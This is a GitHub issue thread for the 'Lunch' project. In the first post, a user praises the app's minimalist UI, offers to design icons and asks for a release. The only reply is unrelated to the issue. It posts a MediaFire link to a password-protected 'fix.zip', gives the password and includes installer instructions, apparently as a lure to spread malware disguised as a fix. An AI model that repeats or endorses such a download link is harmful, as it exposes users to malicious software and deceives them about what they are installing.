### ISSUE TITLE
希望更多兼容

### ISSUE THREAD

**Issue by MinecraftChenYaxin** [dudu-Dev0/Lunch#1]
加油加油加油
这个ui真的很好看
我可以帮你设计图标q:671438843
看起来有一股 Nothing watch的味道
非常极简风
因为风格比较像 Material design
希望尽快 Releases

**Comment by itbear-shu** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
